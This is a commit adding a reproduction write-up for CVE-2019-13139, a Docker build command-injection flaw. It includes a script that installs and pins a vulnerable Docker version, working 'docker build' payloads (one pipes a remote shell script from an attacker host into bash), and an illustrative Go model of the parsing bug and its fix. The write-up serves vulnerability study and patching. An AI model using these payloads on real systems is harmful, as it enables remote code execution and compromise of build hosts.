update CVE-2019-13139

This commit is contained in:
Threekiii 2025-04-21 17:36:11 +08:00
parent ad0e23d14b
commit 98dd292f01
4 changed files with 94 additions and 0 deletions

@ -0,0 +1,94 @@
# Docker build command execution vulnerability CVE-2019-13139
## Vulnerability description
When building a local image with `docker build`, the build context can be given as a remote URL, and that remote context may be a git repository.
In Docker versions before 18.09.4 the builder parsed this `remoteUrl` incorrectly: the fragment after `#` (intended as `ref:subdir`) was handed to `git fetch` unchecked, so a fragment beginning with `-` is read by git as a command-line option. Part of the `remoteUrl` string is therefore executed as a command, for example through `--upload-pack=<command>`.
References:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13139
- https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-build/
- https://github.com/Metarget/metarget
## Affected versions
```
Docker < 18.09.4
```
## Environment setup
On Ubuntu 18.04, install Docker 18.09.3 with the following script, `install_docker_18.09.03.sh`:
```
#!/bin/bash
# Installs the vulnerable Docker 18.09.3 on Ubuntu 18.04 (bionic) from the
# Tsinghua mirror of the docker-ce repository and pins it against upgrades.
set -e
echo "[*] Removing old Docker versions (if any)..."
sudo apt remove -y docker docker-engine docker.io containerd runc || true
echo "[*] Removing incorrect Docker sources..."
sudo rm -f /etc/apt/sources.list.d/docker.list || true
sudo sed -i '/download.docker.com/d' /etc/apt/sources.list
echo "[*] Adding Tsinghua University Docker mirror GPG key..."
# apt-key is deprecated on newer Ubuntu releases but still works on 18.04
wget -qO - https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
echo "[*] Adding Tsinghua University Docker mirror repository..."
echo "deb [arch=amd64] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu bionic stable" \
| sudo tee /etc/apt/sources.list.d/docker.list
echo "[*] Updating package index..."
sudo apt update
echo "[*] Searching for Docker 18.09.3..."
# apt-cache madison prints "package | version | source"; the version is the third field
VERSION_STRING=$(apt-cache madison docker-ce | grep 18.09.3 | head -n1 | awk '{print $3}')
if [ -z "$VERSION_STRING" ]; then
echo "[*] Docker 18.09.3 not found"
exit 1
fi
echo "[*] Found version: $VERSION_STRING"
echo "[*] Installing Docker version $VERSION_STRING ..."
sudo apt install -y docker-ce=$VERSION_STRING docker-ce-cli=$VERSION_STRING containerd.io
echo "[*] Locking version to prevent automatic updates..."
# hold the packages so a later "apt upgrade" does not silently patch the vulnerability
sudo apt-mark hold docker-ce docker-ce-cli containerd.io
echo "[*] Installation complete, current version:"
docker --version
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090739097.png)
## Reproduction
Run the exploit command. The build itself fails with an error, but that does not matter: the injected command still runs.
```
docker build "git@g.com/a/b#--upload-pack=touch 13139.txt;:"
```
Check that the command ran:
```
ls | grep 13139
------
13139.txt
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090836057.png)
Download a remote shell script and execute it:
```
# the listener must be on port 80: the first ':' in the fragment separates the ref
# from the build subdirectory, so "ip:port" cannot appear in the payload
docker build "git@github.com/a/b#--upload-pack=curl -s your-ip/shell.sh|bash;#:"
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421092642068.png)
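To make the description and the two payloads above concrete, the following is an added illustration, not the project's code and not from the original page: a simplified Go model of how the builder split the `repo#ref:subdir` argument and appended the ref to `git fetch` before 18.09.4, beside the check that the fix adds (rejecting a ref that starts with `-`). The function names `parseRemoteURL`, `getRefAndSubdir` and `fetchArgs` follow the naming in moby's `builder/remotecontext/git` package, but the bodies are a reconstruction and the exact `git fetch` argument list is assumed. The inputs are the page's payloads plus a constructed one carrying `ip:port`, which shows why the listener has to be on port 80.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// gitRepo is what the builder derives from the remote argument:
// the clone URL, the ref to fetch and the build-context subdirectory.
type gitRepo struct {
	remote string
	ref    string
	subdir string
}

// isGitTransport: a git@ address is accepted verbatim, anything without a
// scheme is forced to https before URL parsing (assumed, modelled on moby).
func isGitTransport(s string) bool {
	return strings.HasPrefix(s, "http://") || strings.HasPrefix(s, "https://") ||
		strings.HasPrefix(s, "git://") || strings.HasPrefix(s, "git@")
}

// getRefAndSubdir splits the fragment "ref:subdir". Only the first ':' is a
// separator, so a ref may contain spaces, ';' and '|' but never a ':'.
func getRefAndSubdir(fragment string) (ref, subdir string) {
	ref = "master" // default when the fragment carries no ref
	refAndDir := strings.SplitN(fragment, ":", 2)
	if refAndDir[0] != "" {
		ref = refAndDir[0]
	}
	if len(refAndDir) > 1 {
		subdir = refAndDir[1]
	}
	return ref, subdir
}

// parseRemoteURL is the pre-18.09.4 behaviour: the fragment is taken as-is.
func parseRemoteURL(remote string) (gitRepo, error) {
	if !isGitTransport(remote) {
		remote = "https://" + remote
	}
	var repo gitRepo
	if strings.HasPrefix(remote, "git@") {
		// git@host:path is not a URL, so it is split by hand on '#'.
		parts := strings.SplitN(remote, "#", 2)
		repo.remote = parts[0]
		fragment := ""
		if len(parts) == 2 {
			fragment = parts[1]
		}
		repo.ref, repo.subdir = getRefAndSubdir(fragment)
		return repo, nil
	}
	u, err := url.Parse(remote)
	if err != nil {
		return gitRepo{}, err
	}
	repo.ref, repo.subdir = getRefAndSubdir(u.Fragment)
	u.Fragment = ""
	repo.remote = u.String()
	return repo, nil
}

// parseRemoteURLFixed adds the check that closed CVE-2019-13139: a ref that
// starts with '-' would be read by git as an option, so it is rejected.
func parseRemoteURLFixed(remote string) (gitRepo, error) {
	repo, err := parseRemoteURL(remote)
	if err != nil {
		return gitRepo{}, err
	}
	if strings.HasPrefix(repo.ref, "-") {
		return gitRepo{}, errors.New("invalid refspec: " + repo.ref)
	}
	return repo, nil
}

// fetchArgs is the (assumed) argv handed to git after cloning: the ref is
// appended positionally with nothing separating it from the options, which is
// exactly where "--upload-pack=<command>" lands.
func fetchArgs(ref string) []string {
	return []string{"fetch", "--depth", "1", "origin", ref}
}

func main() {
	payload := "git@g.com/a/b#--upload-pack=touch 13139.txt;:"
	repo, _ := parseRemoteURL(payload)
	fmt.Printf("vulnerable: git %s\n", strings.Join(fetchArgs(repo.ref), " "))
	if _, err := parseRemoteURLFixed(payload); err != nil {
		fmt.Println("fixed:", err)
	}
}
```

Running it prints the `git fetch` line that the vulnerable builder would execute and the rejection the fixed parser produces for the same input; feeding it a payload containing `ip:port` shows the ref being cut at the first colon, which is the practical reason the download example uses port 80.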
## Fix
- Upgrade to Docker 18.09.4 or later (https://docs.docker.com/engine/release-notes/); the fixed builder rejects a git ref that begins with `-` as an invalid refspec.
